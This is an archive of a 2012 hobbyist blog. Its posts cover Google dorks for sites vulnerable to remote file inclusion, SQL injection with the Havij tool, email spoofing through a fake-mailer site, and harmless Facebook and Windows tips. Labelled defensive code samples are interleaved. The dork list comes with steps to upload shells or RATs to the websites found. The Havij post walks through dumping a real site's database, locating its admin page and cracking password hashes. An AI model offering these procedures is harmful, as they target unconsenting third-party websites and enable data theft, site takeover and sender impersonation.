Thursday, 10 May 2012

Google Dork For "Remote File Inclusion"

Google dorks are at the center of Google hacking. Many hackers use Google to find vulnerable web pages and later use these vulnerabilities for hacking.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.
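
From the site owner's side, requests that try to abuse an unvalidated include parameter are visible in the web server's access log. The following is an added example, not part of the original post: it scans log lines for query parameters whose value is a remote URL or stream wrapper. The log lines, addresses and host names are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Schemes that have no business appearing as the *value* of an include-style
# parameter; php:// and data: are PHP stream wrappers abused the same way.
REMOTE_VALUE = re.compile(r"^\s*(https?|ftps?|php|data|expect)\s*:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def rfi_candidates(log_lines):
    """Return (client_ip, path, parameter, value) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            if REMOTE_VALUE.match(unquote(value)):
                hits.append((line.split()[0], url.path, name, value))
    return hits

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2012:10:01:02 +0000] "GET /index.php?page=contact.php HTTP/1.1" 200 5120',
    '198.51.100.23 - - [10/May/2012:10:01:09 +0000] "GET /index.php?page=http://files.example/x.txt HTTP/1.1" 200 312',
    '198.51.100.23 - - [10/May/2012:10:01:15 +0000] "GET /template.php?pagina=http%253A%252F%252Ffiles.example%252Fx.txt HTTP/1.1" 200 298',
    '203.0.113.7 - - [10/May/2012:10:02:00 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, path, name, value in rfi_candidates(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value}")
```

A hit with a 200 response on a script that includes files by parameter is worth reviewing first; the durable fix is to map the parameter to a fixed allowlist of local files instead of passing it to the include.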
List of Google Dorks for Remote File Inclusion:
  • inurl:rte/my_documents/my_files
  • inurl:/my_documents/my_files/
  • inurl:/shoutbox/expanded.php?conf=
  • inurl:/main.php?x=
  • inurl:/myPHPCalendar/admin.php?cal_dir=
  • inurl:/index.php/main.php?x=
  • inurl:/index.php?include=
  • inurl:/index.php?x=
  • inurl:/index.php?open=
  • inurl:/index.php?visualizar=
  • inurl:/template.php?pagina=
  • inurl:/index.php?pagina=
  • inurl:/index.php?inc=
  • inurl:"index.php?page=contact.php"
  • inurl:"template.php?goto="
  • inurl:"video.php?content="
  • inurl:"pages.php?page="
  • inurl:"index1.php?choix="
  • inurl:tinybrowser/upload.php
  • inurl:examples/uploadbutton.html
  • inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
  • inurl:/include/new-visitor.inc.php?lvc_include_dir=
  • inurl:/_functions.php?prefix=
  • inurl:/cpcommerce/_functions.php?prefix=
  • inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
  • inurl:/modules/agendax/addevent.inc.php?agendax_path=
  • inurl:/ashnews.php?pathtoashnews=
  • inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
  • inurl:/pm/lib.inc.php?pm_path=
  • inurl:/b2-tools/gm-2-b2.php?b2inc=
  • inurl:/includes/include_once.php?include_file=
  • inurl:/e107/e107_handlers/secure_img_render.php?p=
  • intitle:index of? inurl:kindeditor

How to Use Google Dorks for Remote File Inclusion:
  1. Copy any one of the Google dorks from the list above.
  2. Paste it into the Google search box and click Search.
  3. The vulnerable websites are now listed in the search results.
  4. Click any one of the links; you will find an upload option on it.
  5. Now you can upload your files, such as images, HTML files, documents, shell, RAT, etc.

This is a simple method to find websites vulnerable to Remote File Inclusion (RFI) using Google dorks. For a hacker, Google is not only a search engine; it is also a tool for hacking. Thank you!!


Friday, 3 February 2012

SQL Injection Using Havij

SQL injection is a code injection technique that exploits a security vulnerability in a website's software. It is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.
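
The difference between chaining user input into the SQL text and binding it as a parameter, shown as an added example that is not part of the original post. The `news` table, its rows and the function names are constructed for illustration; SQLite stands in for the backend database.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the site's backend (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, draft INTEGER)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(128, "Old post", 0), (129, "Public post", 0), (130, "Unpublished", 1)])
    return db

def news_concatenated(db, raw_id):
    """Vulnerable pattern: the id parameter is pasted into the SQL text."""
    sql = "SELECT title FROM news WHERE draft = 0 AND id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def news_parameterized(db, raw_id):
    """Hardened pattern: validate the type, then bind the value as data."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []                      # reject instead of passing it to the DB
    return [row[0] for row in db.execute(
        "SELECT title FROM news WHERE draft = 0 AND id = ?", (int(raw_id),))]

def probe(fn, raw_id):
    """Return the rows, or the name of the database error the input triggers."""
    db = make_db()
    try:
        return fn(db, raw_id)
    except sqlite3.Error as exc:
        return type(exc).__name__

if __name__ == "__main__":
    # A normal id, a stray apostrophe, and input that embeds SQL.
    for value in ("129", "129'", "129 OR 1=1"):
        print(repr(value), probe(news_concatenated, value), probe(news_parameterized, value))
```

With concatenation the stray apostrophe surfaces as a database error and the embedded condition returns the unpublished row; with validation and a bound parameter both inputs simply return nothing.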

Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. Using this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file. The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.

Finding the SQL Vulnerable Websites :
  • We will use Google dorks to find the vulnerable websites. The most common dorks for SQL injection vulnerable sites are:

    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=

  • Just search Google using one of the dorks and you will see a lot of vulnerable websites. They look like the one below:
    Example : http://lodge4hacker.com/news.php?id=129

  • Now simply add an apostrophe ( ' ) to the end of the URL and press Enter. If the website replies with an error, then it shows that the website is vulnerable to SQL injection.

SQL Injection Using Havij Tool :
  • Start Havij and copy the URL into the target address (the same URL which we used to test for the SQL injection vulnerability, but without the ' ).

  • Click on the Analyze button and wait for Havij to discover the database files for you.

  • At the bottom of the Havij terminal you will see the search progress in detail.

  • Once a database is found, you can click on the Tables tab to view the available tables. All the tables that are available in the database of the website are now shown.

  • Select a table and click on Get Columns. You will be shown the various columns that are present in the table.

  • Now select those columns whose data you want to retrieve. After selecting the columns, click on Get Data to get the values stored in the columns.

Now the website's full database is with you; you can do whatever you want!!

Finding Admin Page Using Havij Tool :
  • To find the admin page of a website, click the Find Admin tab.

  • Now type the website link in Path to search and click Start.

  • Now you will get the admin page listed below.

Decrypt MD5 Hash Using Havij :
  • To decrypt an MD5 hash, click MD5 in the Havij tool.

  • Now paste your hash into the MD5 hash input box and click Start.

  • Now you will get the decrypted hash in the table, from various online decryption websites.




Tuesday, 24 January 2012

Best Browser-Based P2P File Sharing Sites

"Technology Rules the World". Everyone knows technology has taken over the world and has forever changed the way we communicate, connect, share information and transfer files. In the past, when we wanted to transfer a file to someone, we used email, but it supports only a limited size (up to 10 MB). Then online file hosting websites arrived, but they too have limitations: limited storage space, a maximum file size allowed for transfer, or an expiry time to collect the file. Now P2P file sharing sites have been introduced to overcome these limitations!!

What is Peer to Peer?
Peer-to-peer file sharing, commonly known as P2P, is a convenient way of sharing files over the internet. However, you must be very careful when using P2P because some of the files uploaded to the internet have viruses, spyware and other threats that can harm your PC, so transfer files only with your friends.

List of Best Browser-Based P2P File Sharing Sites

Files Over Miles
FilesOverMiles is a direct file sharing tool for quickly and securely sending files over the internet. There is no installation or sign-up, and transferred files are not stored anywhere.

PipeBytes
PipeBytes is a favorite web-based P2P file sharing service. There's no upload limit, and your friend can start downloading the file as you upload it.

JetBytes
JetBytes is an experimental direct file transfer tool that lets you quickly send files over the net. The application creates a direct link between sender and receiver and does not store files during the transfer.

Dushare
Dushare is a simple direct file-transfer service. It makes sending unlimited file sizes between two people as simple as clicking a link.

xFiles
xFiles is a P2P-based file transfer service that completely eliminates all of these risks. Just head over to xFiles and choose the file you want to transfer. Once you have selected the file, you will instantly be provided with a URL that you can send to the desired recipient. Once they go to the URL and click claim, the file will start downloading to their computer.

Conclusion
The browser-based P2P file sharing sites above are the best sites from my analysis. I always preferred to use Files Over Miles; it's working well. If you like this post, leave a small comment and like here...
Thank you,
Best Wishes!!


Monday, 16 January 2012

Anonymous Hackers Wallpaper



Create File With Fixed Size and Type in Windows

Command Prompt is a non-graphical interface that allows you to interact with your operating system. Once you learn how to use Command Prompt and its commands, you can unleash supreme power and rule your computer! But really, you can do almost anything with cmd.

Steps:
  1. Go to Start -> All Programs -> Accessories, right-click Command Prompt and click "Run as administrator".
  2. In Command Prompt, go to the directory in which you want to create the file.
     -------------- Commands to Change Directory -------------------
     cd <name of directory>      (to enter a directory)
     cd ..                       (to exit from the current directory)
     ----------------------------------------------------------------
  3. Now enter the command to create a file with a fixed size and type:
     fsutil file createnew <file name> <size in bytes>
     Example:
     fsutil file createnew test.mp3 20000000000
     The file is created in your specified directory!!

-------------------------------Description of Fsutil Command--------------------------------
Fsutil is a command-line utility that you can use to perform many FAT and NTFS file system related tasks, such as managing reparse points, managing sparse files, dismounting a volume, or extending a volume. Because fsutil is quite powerful, it should only be used by advanced users who have a thorough knowledge of Windows XP. In addition, you must be logged on as an administrator or a member of the Administrators group in order to use fsutil.
---- Fsutil SubCommands----
8dot3name       8dot3name managment
behavior        Control file system behavior
dirty           Manage volume dirty bit
file            File specific commands
fsinfo          File system information
hardlink        Hardlink management
objectid        Object ID management
quota           Quota management
repair          Self healing management
reparsepoint    Reparse point management
resource        Transactional Resource Manager management
sparse          Sparse file control
transaction     Transaction management
usn             USN management
volume          Volume management
--------------------------
------------------------------------------------------------------------------------------------------

Conclusion:
This tutorial not only shows how to create a file with a fixed size and type in Windows but also explains the use of the powerful command "fsutil". If you like this post, please give me a like in the Facebook like box above.

Note:  FSUTIL utility requires administrative privileges.

Thursday, 12 January 2012

Use Your Profile Picture As Emoticon In Facebook Chat

Today we are going to see another feature that Facebook recently introduced, one of the coolest things ever in Facebook Chat. For years we have been using emoticons to express our feelings, but now with this new Facebook People Emoticon feature we can use any person's, official page's or event page's display picture in Facebook chat.

Steps to Use Your Profile Picture As Emoticon In Facebook Chat :
Step-1 :
You just need to have a username for your profile; if you don't have one, you can set your Facebook profile username here.
Or
You can check the link of your profile and you will find a number like this: 100003262824948. You can use this instead of your username.
Step-2:
Now open the Chat box/Messages and in the text bar write [[Username]] or [[Profile ID]] and hit Enter.
Example:  [[100003262824948]]   or   [[siva01sankar]]
Now enjoy the new Facebook People Emoticon / Smiley feature!!

Conclusion:
Facebook is a dynamic, growing company releasing new features day by day. This feature, "Profile Picture As Emoticon In Facebook Chat", has a limitation: these custom emoticons can be sent using mobile devices, but they cannot be viewed as graphics on mobile. They will be displayed as brackets with codes in the mobile view, but in the desktop view they appear normally. Keep visiting our blog, and please leave a small comment below to help me improve my blogging skills.



Friday, 6 January 2012

Update Facebook Status Via “YOUR NAME”


We are always looking for ways to impress our friends, maybe through the latest applications or a status. Facebook is a community where we can connect and share with others. We can see that most people update their comments from different applications and devices like iPhone, Android, Twitter, etc.
Here we are going to see how to update via your name!!

How exactly is this done though?
We need to create our own personalized application. Writing the code for an application is a difficult and time-consuming process, but here we are going to use a small trick to update our status via any name you like. Let's see how to do this!!

Steps to Update Facebook Status Via “YOUR NAME” :-
  • Go to Facebook Developers.
  • Now go to Create New App (in the upper right side of the page).
  • Now enter an App Display Name and agree to the Facebook Platform Policies.
  • Then complete the Security Check (CAPTCHA). You will be taken to the Dashboard after the Security Check.
  • Now you can see your application numbers (App ID/API Key). Note your App ID.
  • Now go to "https://www.facebook.com/connect/prompt_feed.php?preview=true&api_key=XXXXXXXXXXX" after replacing XXXXXXXXXXX with your App ID.
  • Now you will see a Facebook status bar, where you can update anything you want via your own App name.


Sunday, 1 January 2012

Facebook launches Messenger for Windows Now Officially Available For Download

Facebook is a social utility that connects people with friends and others who work, study and live around them. Facebook launched in February 2004 and in a short period reached position #2 (Alexa Traffic Rank) with its dynamic and user-friendly services. Now Facebook has launched Messenger for Windows, which allows users to connect with their friends without relying on a browser to sign in.



Facebook said in its Help Center that :
Messenger is a new, trial application that lets you use Facebook without being on www.facebook.com. While you surf the web or use other applications on your computer, you can: 
  • Chat and message with your friends on Facebook
  • See the latest updates from your friends in ticker
  • Get quick notifications about what’s going on
We’re testing out a first version of the app with a small group of people. During this trial period, we plan on rolling out changes to the app and expect outages and periods of instability as we make improvements
Conclusion:
Overall, Facebook Messenger provides awesome features. It allows users access to the real-time aspects of the website without the need to have the browser open and without the distraction of all of the other features.




Thursday, 22 December 2011

Online Email Spoofing Using Emkei's Fake Mailer


Email spoofing is email activity in which the sender address and other parts of the email header are altered to appear as though the email originated from a different source.
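
On the receiving side, altered sender headers can be checked against the envelope sender and the authentication verdicts recorded by the recipient's mail server. The following is an added example, not part of the original post: both messages and all domains are constructed, and it assumes the `Authentication-Results` header was written by your own receiving server (RFC 8601), since a copy supplied by the sender cannot be trusted.

```python
import re
from email import message_from_string
from email.utils import parseaddr

def domain_of(header_value):
    """Lower-cased domain of the address in a From/Return-Path style header."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()

def spoofing_signals(raw_message):
    """List the reasons a message's claimed sender should not be trusted."""
    msg = message_from_string(raw_message)
    reasons = []
    from_dom = domain_of(msg["From"])
    env_dom = domain_of(msg["Return-Path"])
    if env_dom and env_dom != from_dom:
        reasons.append(f"From domain {from_dom} differs from envelope domain {env_dom}")
    # Verdicts recorded by the receiving server for SPF, DKIM and DMARC.
    results = " ".join(msg.get_all("Authentication-Results") or [])
    if not results:
        reasons.append("no Authentication-Results header")
    for method in ("spf", "dkim", "dmarc"):
        verdict = re.search(rf"\b{method}=(\w+)", results, re.I)
        if verdict and verdict.group(1).lower() != "pass":
            reasons.append(f"{method}={verdict.group(1).lower()}")
    return reasons

# Constructed sample messages (reserved .example domains).
SPOOFED = (
    "Return-Path: <www-data@mailer.example>\n"
    "Authentication-Results: mx.recipient.example; spf=softfail "
    "smtp.mailfrom=mailer.example; dkim=none; dmarc=fail header.from=bank.example\n"
    'From: "Bank Support" <support@bank.example>\n'
    "To: user@recipient.example\nSubject: Account notice\n\nPlease review.\n"
)
GENUINE = (
    "Return-Path: <support@bank.example>\n"
    "Authentication-Results: mx.recipient.example; spf=pass "
    "smtp.mailfrom=bank.example; dkim=pass header.d=bank.example; dmarc=pass\n"
    "From: support@bank.example\nTo: user@recipient.example\n\nStatement ready.\n"
)

if __name__ == "__main__":
    print(spoofing_signals(SPOOFED))
    print(spoofing_signals(GENUINE))
```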


Emkei's Fake Mailer is a website to send fake emails from anybody to anybody. Emkei is a fake mail server that captures emails as files for acceptance testing. This avoids the excessive configuration of setting up a real mail server and trying to extract mail queue content. There are many free services that allow you to send fake emails, but some of them do not allow sending links (URLs) along with the fake email. If you need such a service for sending fake emails with hyperlinks, then I would recommend Emkei's Fake Mailer. This is a useful website which allows you to send fake emails.

Note : Kindly do not misuse it for any other purposes. Your IP address gets saved on their server, so do not misuse this free service.


